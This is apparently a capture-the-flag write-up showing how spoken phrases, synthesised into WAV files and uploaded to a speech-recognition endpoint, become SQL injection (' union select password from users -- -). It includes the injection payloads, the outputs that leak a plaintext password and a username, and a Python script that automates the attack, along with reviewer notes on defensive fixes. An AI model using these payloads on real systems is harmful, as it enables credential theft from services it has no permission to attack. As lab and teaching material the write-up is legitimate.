AI

ai

Sample PHP Pseudo Code #

// Pseudo code: run speech recognition on a WAV file and report whether the
// recognised speech matches the expected phrase.
$voice = new play('file.wav');
$result = $voice->recognise("Good Morning");
if (!$result) {
  echo "No match found";
} else {
  echo "Matched Good Morning";
  // flag to database or csv
  // NOTE(review): if the recognised text itself is ever written to the
  // database, bind it as a query parameter. A transcript of a user-supplied
  // audio file is untrusted input like any other form field.
}

Attacks #

Tools #

# Generates WAV file from Male US voice
# (flite: the quoted argument is the text to speak, the last argument is the output WAV)
flite -voice rms "hello world" a.wav
# Festival's text2wave reads the text from stdin and writes the WAV named by -o
echo "Hello open single quote" | text2wave -o ai.wav

Voice to SQL #

Speech to SQL Queries and Payloads #

# I didn't see a speech-to-text command for "select" on the
# Microsoft website, but it works in this form.
# In the echoed input below, "open single quote" comes back as ' and
# "comment database" comes back as -- -.
# NOTE(review): the echo suggests the transcript is placed into the SQL
# statement unescaped. Binding the transcript as a query parameter on the
# server side would keep a spoken quote from ending the string literal.
# Result:
#  <h3>Our understanding of your input is : 'union select 1 -- -<br />Query result : 1<h3>
./sqli.py "open single quote union select 1 comment database"

# Here, "select" and "password" were combined into "selectpassword"
# NOTE(review): the value below is returned in readable form, which suggests
# the application stores passwords in plaintext. Storing salted password
# hashes would limit what a query like this exposes.
# Result: H,Sq9t6}a<)?q93_
./sqli.py "open single quote union selectpassword from users comment database"

# Adding "space" to get username
# Result: <h3>Our understanding of your input is : 'union select   username from users -- -<br />Query result : alexa<h3>
./sqli.py "open single quote union select space username from users comment database"
' union select password from users#

Python script to automate upload of WAV File #

#!/usr/bin/env python3

import requests
import os
import sys
import re

# Files written to the current working directory on every run:
# the text handed to the speech synthesiser and the WAV it produces.
voice_filename = 'voice.txt'
wav_filename = 'voice.wav'

# Endpoint that receives the uploaded WAV (see send_file).
url = 'http://ai/ai.php'
# Requests to http:// URLs are routed through 127.0.0.1:8080, presumably a
# local intercepting proxy. No 'https' entry is configured.
proxies = {'http': 'http://127.0.0.1:8080'}

# The text to be spoken is the first command-line argument; without it,
# show the usage line and stop.
if len(sys.argv) < 2:
  print('Example Usage: ./sqli.py "Comment database"')
  sys.exit(0)
query = sys.argv[1]

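def generate_wav(query):
  """Synthesise ``query`` to speech and save it as ``wav_filename``.

  The text is first written to ``voice_filename`` and that file is handed to
  flite, so the query itself never appears on the command line.

  Args:
    query: Text to be spoken.

  Raises:
    subprocess.CalledProcessError: flite exited with a non-zero status.
    FileNotFoundError: the flite binary is not installed.
  """
  # Function-scope import so this block does not depend on the file's
  # top-of-file import list.
  import subprocess

  with open(voice_filename, 'w') as f:
    f.write(query)
  # Argument list instead of a shell string: no shell parsing of the file
  # names. check=True stops the script when synthesis fails, rather than
  # letting a stale or missing WAV be uploaded.
  subprocess.run(
    ['flite', '-voice', 'rms', voice_filename, wav_filename],
    check=True,
  )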

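def send_file():
  """Upload ``wav_filename`` to ``url`` and print the server's echo line.

  The WAV is posted as the multipart field ``fileToUpload`` together with the
  ``submit`` field, through the configured ``proxies``. The first
  ``<h3>Our understanding...<h3>`` fragment of the response body is printed.
  If the fragment is absent, a short diagnostic with the HTTP status is
  printed instead of raising IndexError.

  Raises:
    requests.RequestException: the request failed or timed out.
    OSError: ``wav_filename`` could not be opened.
  """
  # The context manager closes the WAV handle even if the request raises.
  with open(wav_filename, 'rb') as wav:
    files = {
      'fileToUpload': (wav_filename, wav),
      'submit': (None, 'Process It!')
      }
    # An explicit timeout keeps the script from hanging on an unresponsive server.
    r = requests.post(url, files=files, proxies=proxies, timeout=60)
  match = re.search('<h3>Our understanding.+<h3>', r.text)
  if match is None:
    print('No "Our understanding" line in response (HTTP {})'.format(r.status_code))
    return
  print(match.group(0))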

# Script entry: synthesise the command-line text to a WAV first, then upload
# that WAV and print the server's response line. Order matters: send_file
# reads the file that generate_wav writes.
generate_wav(query)
send_file()

References #